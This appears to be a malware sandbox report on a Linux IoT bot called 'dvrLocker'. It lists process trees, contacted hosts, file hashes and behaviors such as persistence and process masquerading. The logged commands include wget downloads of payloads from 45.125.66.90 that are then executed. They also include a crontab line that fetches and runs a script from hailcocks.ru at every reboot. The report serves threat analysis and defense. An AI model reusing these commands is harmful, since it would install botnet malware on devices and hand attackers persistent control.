[ls -l /proc/144/exe]

/bin/ls

[ls -l /proc/146/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/153/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/168/exe]

/bin/ls

[ls -l /proc/169/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/235/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/291/exe]

/bin/ls

[ls -l /proc/292/exe]

/bin/ls

[ls -l /proc/293/exe]

/bin/ls

[ls -l /proc/295/exe]

/bin/ls

[ls -l /proc/298/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/322/exe]

/bin/ls

[ls -l /proc/324/exe]

/bin/ls

[ls -l /proc/327/exe]

/bin/ls

[ls -l /proc/344/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/41/exe]

/bin/ls

[ls -l /proc/42/exe]

/bin/ls

[ls -l /proc/43/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/589/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/605/exe]

/bin/ls

[ls -l /proc/607/exe]

/bin/ls

[ls -l /proc/609/exe]

/bin/ls

[ls -l /proc/610/exe]

/bin/ls

[ls -l /proc/641/exe]

/bin/ls

[ls -l /proc/647/exe]

/bin/ls

[ls -l /proc/648/exe]

/bin/ls

[ls -l /proc/650/exe]

/bin/ls

[ls -l /proc/652/exe]

/bin/ls

[ls -l /proc/653/exe]

/bin/ls

[ls -l /proc/654/exe]

/bin/ls

[ls -l /proc/655/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf /mnt/dvrLocker]

Network

Country Destination Domain Proto
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
US 168.235.111.72:53 kingstonwikkerink.dyn udp
BG 31.13.248.234:5372 kingstonwikkerink.dyn tcp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

memory/808-1-0xb678b000-0xb679c044-memory.dmp

/tmp/lib/dvrLocker

MD5 d09db60a70d5b53b5b53ad39476fd7e8
SHA1 73a75e5e8200f77d857a7256cc0979077e29241d
SHA256 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512 ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

/var/spool/cron/crontabs/tmp.7ecNDm

MD5 7d430e045766ddb81fa3cdc9a1615d90
SHA1 79dfcc0c73acbf0b65f441d0a1eb56099079fbd3
SHA256 92d638a1e2a2c268a45a7c205c60a607ef650bf9982c589931ffd9303cb121ab
SHA512 1c2b5933370207dd545b856cf516a7cdc4d3e7e95ccc06a4e398af3be4e3674f6afec9e391e89c2486eaba0d00d7057fcf40e4369dd9a9b3e2077210ce2ec631

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-27 02:39

Reported

2024-11-27 02:42

Platform

debian9-mipsbe-20240418-en

Max time kernel

149s

Max time network

137s

Command Line

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 81.169.136.222 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.hCusdS /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [watchdog/0] /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/911/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/923/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/mounts /tmp/lib/dvrLocker N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/926/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/903/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/910/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/918/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/850/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/895/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/920/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/925/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/866/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/847/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/868/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/922/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/843/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/873/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/842/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/899/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/880/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/898/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/919/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/906/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/912/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/885/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/846/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/851/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/841/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/867/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/924/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/849/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/870/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/882/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/886/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/893/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/704/cmdline /tmp/lib/dvrLocker N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown N/A

Processes

/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/110/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/126/exe]

/bin/ls

[ls -l /proc/127/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/152/exe]

/bin/ls

[ls -l /proc/159/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/176/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/243/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/330/exe]

/bin/ls

[ls -l /proc/333/exe]

/bin/ls

[ls -l /proc/334/exe]

/bin/ls

[ls -l /proc/336/exe]

/bin/ls

[ls -l /proc/337/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/389/exe]

/bin/ls

[ls -l /proc/391/exe]

/bin/ls

[ls -l /proc/394/exe]

/bin/ls

[ls -l /proc/399/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/402/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/661/exe]

/bin/ls

[ls -l /proc/674/exe]

/bin/ls

[ls -l /proc/677/exe]

/bin/ls

[ls -l /proc/679/exe]

/bin/ls

[ls -l /proc/680/exe]

/bin/ls

[ls -l /proc/696/exe]

/bin/ls

[ls -l /proc/697/exe]

/bin/ls

[ls -l /proc/699/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/70/exe]

/bin/ls

[ls -l /proc/701/exe]

/bin/ls

[ls -l /proc/702/exe]

/bin/ls

[ls -l /proc/703/exe]

/bin/ls

[ls -l /proc/704/exe]

/bin/ls

[ls -l /proc/705/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/75/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf mips]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

Network

Country Destination Domain Proto
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
DE 81.169.136.222:53 kingstonwikkerink.dyn udp
FR 194.58.66.244:10875 kingstonwikkerink.dyn tcp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/var/spool/cron/crontabs/tmp.hCusdS

MD5 52e1ad18d178f2dcf0faeda00070f21e
SHA1 c683c24e4fe9a0ed77cb7623e061d86179185397
SHA256 d34450689b23cae53222c9fc6c976d4b7a72ede1c77caea45659a2cb3387f9a1
SHA512 112c995b57dffa2713a0d5610d90b55b70d56703b66b970bf1f7d82b74c5518770882c3d43c23286cdc1fce7acb4b55c4d6b3e71f9513e8052437caeaf6c0ffa

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-27 02:39

Reported

2024-11-27 02:42

Platform

debian9-mipsel-20240226-en

Max time kernel

150s

Max time network

140s

Command Line

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 217.160.70.42 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.Uw0tZs /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/889/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/873/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/874/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/922/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/924/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/898/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/901/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/911/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/710/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/926/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/863/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/864/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/912/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/855/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/865/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/886/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/mounts /tmp/lib/dvrLocker N/A
File opened for reading /proc/841/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/857/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/902/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/908/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/836/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/844/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/882/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/885/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/916/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/919/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/881/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/896/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/900/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/905/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/917/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/850/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/861/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/876/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/890/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/837/status /tmp/lib/dvrLocker N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown N/A

Processes

/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/105/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/114/exe]

/bin/ls

[ls -l /proc/115/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/143/exe]

/bin/ls

[ls -l /proc/148/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/164/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/245/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/320/exe]

/bin/ls

[ls -l /proc/336/exe]

/bin/ls

[ls -l /proc/340/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/365/exe]

/bin/ls

[ls -l /proc/366/exe]

/bin/ls

[ls -l /proc/367/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/385/exe]

/bin/ls

[ls -l /proc/386/exe]

/bin/ls

[ls -l /proc/395/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/402/exe]

/bin/ls

[ls -l /proc/484/exe]

/bin/ls

[ls -l /proc/497/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/526/exe]

/bin/ls

[ls -l /proc/527/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/688/exe]

/bin/ls

[ls -l /proc/69/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/70/exe]

/bin/ls

